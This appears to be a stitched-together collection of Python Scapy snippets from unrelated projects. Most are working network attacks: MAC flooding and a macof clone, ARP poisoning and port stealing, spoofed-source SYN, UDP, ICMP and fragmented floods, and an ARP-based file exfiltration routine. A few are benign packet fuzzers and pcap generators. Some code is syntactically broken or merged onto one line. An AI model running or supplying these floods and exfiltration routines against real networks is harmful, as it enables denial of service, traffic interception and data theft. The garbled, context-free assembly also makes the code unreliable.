def generate_packets():
packet_list = [] #initializing packet_list to hold all the packets
for i in xrange(1, 10000):
packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(),
dst=RandIP())
packet_list.append(packet)
return packet_list
def MACFlood():
packet = ARP(op=2,
psrc=RandIP(),
hwsrc=RandMAC(),
pdst=RandIP(),
hwdst=RandMAC())
return packet
def generate_packets():
packet_list = [
] #inicializa uma lista que armazenam todos os pacotes a serem criados.
for i in xrange(1, 10000):
packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(),
dst=RandIP())
packet_list.append(packet)
return packet_list
def gen_packet(eth_only=False, size=None):
"""Generate a random network packet.
By default, function generates a random IPv4 or IPv6 packet, possibly with
TCP or UDP payloads. If the 'eth_only' parameter is set to True, the
returned packet is an Ethernet frame that does not include any packet
headers above layer 2.
"""
# generate ethernet frame with fixed MAC addresses
pkt = Ether(src="53:00:00:00:00:01", dst="53:00:00:00:00:02")
if not eth_only: # encapsulate IP packet
if randint(0, 1) == 0:
pkt /= IP(src=RandIP()._fix(), dst=RandIP()._fix())
else:
pkt /= IPv6(src=RandIP6()._fix(), dst=RandIP6()._fix())
if IP in pkt: # generated packet L3 is IPv4
rand = random()
if rand < 0.1:
# mark some packets as fragments
if randint(0, 1) == 0:
pkt[IP].flags = 1 # set MF flag
else:
pkt[IP].frag = randint(1, 2**13 - 1) # frag offset
elif rand < 0.8:
# encapsulate TCP / UDP payload in some more
if randint(0, 1) == 0:
pkt /= TCP(sport=randint(0, 2**16 - 1),
dport=randint(0, 2**16 - 1))
else:
pkt /= UDP(sport=randint(0, 2**16 - 1),
dport=randint(0, 2**16 - 1))
else:
# do not encapsulate anything in all others
pass
elif IPv6 in pkt: # generated packet L3 is IPv6
rand = random()
if rand < 0.8:
# encapsulate TCP / UDP payload in some more
if randint(0, 1) == 0:
pkt /= TCP(sport=randint(0, 2**16 - 1),
dport=randint(0, 2**16 - 1))
else:
pkt /= UDP(sport=randint(0, 2**16 - 1),
dport=randint(0, 2**16 - 1))
else:
# encapsulate nothing
pass
# append some random payload
if size is not None:
pkt /= ''.join(chr(randint(0, 255)) for _ in range(size - len(pkt)))
else:
pkt /= ''.join(chr(randint(0, 255)) for _ in range(randint(50, 1000)))
return pkt
def generate_packets(self):
# Initialize list to hold all the packets
packet_list = []
# Create packets with random addresses
for i in xrange(1, 30000):
packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(),
dst=RandIP())
packet_list.append(packet)
return packet_list
def PortStealing():
victimMac = config.VICTIM_MAC
attackerMac = config.ATTACKER_MAC
packet = ARP(op=2,
psrc=RandIP(),
hwsrc=victimMac,
pdst=RandIP(),
hwdst=attackerMac)
return packet
def attack(target_mac,target_ip,gw_ip):
print "[+]Counter Attack !!!"
e = Ether(dst="FF:FF:FF:FF:FF:FF")
while 1:
a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
p = e/a/Padding("\x00"*18)
sendp(p,verbose=0)
a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
p1 = e/a1/Padding("\x00"*18)
sendp(p1,verbose=0)
def generate_packets() -> list:
"""Simple packet_list to hold all packets
Args:
None
Return:
list: packet list.
"""
packet_list = []
for i in range(1, 10000):
packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(),
dst=RandIP())
packet_list.append(packet)
return packet_list
def send(exfiltrate_file, file):
target = config['target']
num_bytes = config['num_bytes']
app_exfiltrate.log_message('warning',
"[!] Registering packet for the file")
data = "%s" % os.path.basename(exfiltrate_file.file_to_send)
packet_index = 0
ether = Ether()
rand_ip = RandIP()
arp = ARP(psrc=rand_ip, hwsrc='00:00:00:00:00:00')
pkt = ether / arp / Raw(load=data)
sendp(pkt, verbose=0)
while True:
packet_index += 1
data_file = file.read(num_bytes).encode('hex')
if not data_file:
break
# ok("Using {0} as transport method".format(protocol_name))
app_exfiltrate.log_message(
'info', "[arp] Sending {0} bytes to {1}".format(len(data), target))
arp = ARP(psrc=rand_ip, hwsrc=int_to_mac(packet_index))
pkt = ether / arp / Raw(load=data_file)
sendp(pkt, verbose=0)
data = "DONE:%s" % exfiltrate_file.checksum
arp = ARP(psrc=rand_ip, hwsrc=int_to_mac(packet_index))
pkt = ether / arp / Raw(load=data)
sendp(pkt, verbose=0)
def send_flood(self):
while True:
send_address = RandIP()
package = IP(src=send_address, dst=self.target_address) / TCP(
sport=self.sport, dport=self.dport, seq=1505066, flags='S')
send(package)
def main():
ether = Ether(src="ff:ff:ff:ff:ff:ff")
arp = ARP(op="who-has",
psrc=RandIP(),
pdst=RandIP(),
hwsrc=RandMAC(),
hwdst=RandMAC())
pkt = ether / arp
pkt_lst = []
for x in xrange(25):
pkt_lst.append(pkt)
sendp(pkt_lst)
def flood_attack():
#Mascaras con las que generar las macs e ips aleatorias
DEFAULT_DIP = '0.0.0.0/0'
DEFAULT_DMAC = 'ff:ff:ff:ff:ff:ff'
DEFAULT_SIP = '0.0.0.0/0'
DEFAULT_SMAC = '*:*:*:*:*:*'
while(True):
srcMac = str(RandMAC(DEFAULT_SMAC))
srcIp = str(RandIP(DEFAULT_SIP))
dstMac = str(RandMAC(DEFAULT_DMAC))
dstIp = str(RandIP(DEFAULT_DIP))
#Construimos el paquete con los datos generados
packet = Ether(src=srcMac, dst=dstMac) / \
ARP(hwsrc=srcMac, psrc=srcIp, pdst=srcIp)
#Enviamos el paquete GARP a broadcast
print('Enviando paquete {} - {}'.format(srcMac, srcIp))
sendp(packet)
time.sleep(0.1)
def build_syn_packet(destination_ip, destination_port):
"""Generate TCP packet with SYN flag and spoofed source IP address.
Arguments:
destionation_ip -- the IP address of the target
destination_port -- the targets port to which the packet will be sent
"""
return IP(src=RandIP(), dst=destination_ip, id=RandShort(), ttl=packet_builder.generate_ttl())/TCP(sport=RandShort(), dport=destination_port, ack=RandShort(), window=RandShort(), flags="S")
def flood_client(self):
""" Function to be called in flooder threads. May slow down the client's ability to handle incoming
packets, thus making communications with the server slower. Since during the attack bad packets are
racing legitimate packets, this can make the attack easier"""
while True:
packet = IP(src=RandIP('*.*.*.*'), dst=CLIENT_SOCK[0]) / TCP(dport=self.client_port, flags='PA')
try:
send(packet, loop=1, inter=0, verbose=False)
except:
continue
def build_icmp_packet(destination_ip):
"""Generate ICMP ECHO request with spoofed source IP address.
Argument:
destination_ip -- the IP address of the target
"""
return IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) / ICMP(
id=RandShort()) / packet_builder.generate_payload()
def tread_def(target_ip, target_port, count_packet_tread, sleeptime, maximum_size, minimum_size):
#global sended
for _ in range(count_packet_tread):
sleep(sleeptime)
fake_ip = RandIP()
s_eq = randint(1000, 9000)
w_indow = randint(1100, 9000)
ip = IP(src=fake_ip, dst=target_ip)
tcp = TCP(sport=RandShort(), dport=target_port, flags="S", seq=s_eq, window=w_indow)
size = Raw(b"M" * randint(minimum_size,maximum_size))
packet = ip / tcp / size
send(packet , verbose=False)
def macFlood(self, interface, targetip):
""" This method is for mac flooding
Usage: wrb.macFlood(interface='wlan0', targetip='192.168.1.154')
"""
self.interface = interface
self.targetip = targetip
floodPacket = Ether(
src=RandMAC("*:*:*:*:*:*"), dst=RandMAC("*:*:*:*:*:*")) / IP(
src=RandIP("*.*.*.*"), dst=self.targetip) / ICMP()
sendp(floodPacket, iface=self.interface, loop=1)
def build_fragmented_icmp_packet(destination_ip):
"""Generate fragmented ICMP packet with spoofed source IP address.
Argument:
destination_ip -- the IP address of the target
"""
return fragment(
IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) / ICMP(id=RandShort()) /
packet_builder.generate_payload(min_count=1500, max_count=65500),
fragsize=packet_builder.generate_fragsize())
def build_udp_packet(destination_ip, destination_port):
"""Generate UDP packet with random source port and spoofed source IP address.
Arguments:
destination_ip -- the IP address of the target
destination_port -- the targets port to which the packet will be sent
"""
return IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) / UDP(
sport=RandShort(),
dport=destination_port) / packet_builder.generate_payload()
def build_fragemneted_udp_packet(destination_ip, destination_port):
"""Generate fragmented UDP packet with random source port and spoofed source IP address.
Arguments:
destination_ip -- the IP address of the target
destination_port -- the targets port to which the packet will be sent
"""
return fragment(
IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) /
UDP(sport=RandShort(), dport=destination_port) /
packet_builder.generate_payload(min_count=1500, max_count=65500),
fragsize=packet_builder.generate_fragsize())
def generator(self, ip_dst, n_generations, n_packets, selected_layer):
# Select the final layer for randomize
if selected_layer == "UDP":
layer = UDP()
elif selected_layer == "TCP":
layer = TCP()
else:
layer = ICMP()
for i in range(n_generations):
print('Generating packets. (%s of %s)\n' % (i + 1, n_generations))
pkts_send = [
fuzz(IP(dst=ip_dst, src=RandIP())) / fuzz(layer) /
str(RandString()) for j in range(n_packets)
]
self.send_pkts(pkts_send)
def build_ipsec_packet(destination_ip, destination_port):
"""Generate encrypted packet with spoofed source IP address.
Arguments:
destination_ip -- the IP address of the target
destination_port -- the targets port to which the packet will be sent
"""
sa = SecurityAssociation(ESP,
spi=0,
crypt_algo='Blowfish',
crypt_key=b'16byteskey',
auth_algo='NULL',
auth_key=None)
return sa.encrypt(
IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) /
TCP(sport=RandShort(), dport=destination_port) /
packet_builder.generate_payload())
def main(args):
print "[*] Comenzando el fuzzing..."
pkt_lst = []
for i in xrange(args.count):
ip_layer = IP(dst=args.target)
# Fuzz IP layer
#
# Src ramdon?
if random_bool():
ip_layer.src = str(RandIP())
# IP ID
if random_bool():
ip_layer.id = int(RandShort())
# IP TTL
if random_bool():
ip_layer.ttl = int(RandInt()) % 255
icmp_layer = ICMP()
# Fuzz ICMP layer
#
# Type random
if random_bool():
icmp_layer.type = int(RandByte())
# Seq random
if random_bool():
icmp_layer.seq = int(RandShort())
pkt = ip_layer/icmp_layer
pkt_lst.append(pkt)
sendp(pkt_lst, inter=args.interval)
print "[*] Enviado %s paquetes" % i
# Bharath(github.com/yamakira) # Matt Kijowski(github.com/mkijowski) # Perform CAM overflow attack on tap0 interface #!/usr/bin/env python from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp # initializing packet_list to hold all the packets packet_list = [] # generate a bunch of random mac addresses and IP addresses for i in xrange(1,10000): packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP()) packet_list.append(packet) # send our bad packets on tap0 sendp(packet_list, iface='tap0')
from scapy.all import RandMAC, RandIP, PcapWriter, RandIP6, RandShort, fuzz
from scapy.all import IPv6, Dot1Q, IP, Ether, UDP, TCP
except ModuleNotFoundError as err:
print(err + ": Scapy")
import sys
path = str(sys.argv[1]) + "/pcap/fuzzy.pcap"
pktdump = PcapWriter(path, append=False, sync=True)
for i in range(0, 2000):
# Generate random protocol bases, use a fuzz() over the combined packet
# for full fuzzing.
eth = Ether(src=RandMAC(), dst=RandMAC())
vlan = Dot1Q()
ipv4 = IP(src=RandIP(), dst=RandIP())
ipv6 = IPv6(src=RandIP6(), dst=RandIP6())
udp = UDP(dport=RandShort(), sport=RandShort())
tcp = TCP(dport=RandShort(), sport=RandShort())
# IPv4 packets with fuzzing
pktdump.write(fuzz(eth / ipv4 / udp))
pktdump.write(fuzz(eth / ipv4 / tcp))
pktdump.write(fuzz(eth / vlan / ipv4 / udp))
pktdump.write(fuzz(eth / vlan / ipv4 / tcp))
# IPv6 packets with fuzzing
pktdump.write(fuzz(eth / ipv6 / udp))
pktdump.write(fuzz(eth / ipv6 / tcp))
pktdump.write(fuzz(eth / vlan / ipv6 / udp))
pktdump.write(fuzz(eth / vlan / ipv6 / tcp))
from scapy.all import IP, sendp, Ether, RandIP, RandMAC, ICMP
packet = Ether(src=RandMAC("*:*:*:*:*:*"), dst=RandMAC("*:*:*:*:*:*")) / IP(
src=RandIP('*.*.*.*'), dst=RandIP('*.*.*.*')) / ICMP()
dev = 'en0'
print('flooding net with random packets on dev')
sendp(packet, iface='en0', loop=1)
if len(sys.argv) > 3:
traffic_opt = str(sys.argv[3])
else:
traffic_opt = ""
pktdump = PcapWriter(path, append=False, sync=True)
pkt = []
for i in range(0, size):
if traffic_opt == "fuzzy":
eth = Ether(src=RandMAC(), dst=RandMAC())
vlan = Dot1Q()
udp = UDP(dport=RandShort(), sport=RandShort())
ipv4 = IP(src=RandIP(), dst=RandIP(), len=random.randint(0, 100))
ipv6 = IPv6(src=RandIP6(), dst=RandIP6(), plen=random.randint(0, 100))
tcp = TCP(dport=RandShort(), sport=RandShort(), flags='S',
dataofs=random.randint(0, 15))
# IPv4 packets with fuzzing
pkt.append(fuzz(eth / ipv4 / udp))
pkt.append(fuzz(eth / ipv4 / tcp))
pkt.append(fuzz(eth / vlan / ipv4 / udp))
pkt.append(fuzz(eth / vlan / ipv4 / tcp))
# IPv6 packets with fuzzing
pkt.append(fuzz(eth / ipv6 / udp))
pkt.append(fuzz(eth / ipv6 / tcp))
pkt.append(fuzz(eth / vlan / ipv6 / udp))
pkt.append(fuzz(eth / vlan / ipv6 / tcp))
def gen_ip(self, field):
"""
Generates an IP address.
"""
return RandIP()._fix()
def create_packet():
packlist = []
for i in xrange(1,40000) # creating the 40000 fake ethernet data packets.
packet = Ether(src = RandMAC() , dst = RandMAC())/IP(src=RandIP() , dst=RandIP())
packlist.append(packet)
def macof(
count=DEFAULT_COUNT,
dip=DEFAULT_DIP,
dmac=DEFAULT_DMAC,
dport=None,
fspeed=DEFAULT_SPEED,
iface=None,
loop=True,
rspeed=None,
sip=DEFAULT_SIP,
smac=DEFAULT_SMAC,
sport=None,
wait=None,
):
if count <= 0 or loop <= 0:
print("Nothing to do.")
return
print("* Pre-generating {0} packets...".format(count))
addresses = set()
dport_rand = dport
dupes = 0
i = 0
pkts = []
sport_rand = sport
while i < count:
smac_rand = str(RandMAC(smac))
# Ensure that the I/G bit remains unset.
old = int(smac_rand[1], 16)
new = old & 14
if old != new:
smac_rand = "{0}{1:x}{2}".format(smac_rand[0], new, smac_rand[2:])
# Ensure source MAC address uniqueness
if smac_rand not in addresses:
addresses.add(smac_rand)
i += 1
if dport is None:
dport_rand = randrange(PORT_MIN, PORT_MAX + 1)
if sport is None:
sport_rand = randrange(PORT_MIN, PORT_MAX + 1)
pkts.append(
Ether(src=smac_rand, dst=str(RandMAC(dmac))) /
IP(src=str(RandIP(sip)), dst=str(RandIP(dip))) /
TCP(sport=sport_rand,
dport=dport,
flags='R',
options=[('Timestamp', (0, 0))]))
else:
dupes += 1
if dupes > MAX_DUPES:
raise ValueError(
"Failed to generate MAC addresses:" +
"mask to narrow for the number of addresses to generate.")
addresses = None
if rspeed or wait:
send(pkts, iface=iface, loop=1, speed=fspeed)
if loop is not True:
loop -= 1
if loop != 0:
send(pkts, iface=iface, loop=loop, speed=rspeed, wait=wait)
else:
send(pkts, iface=iface, loop=loop, speed=fspeed)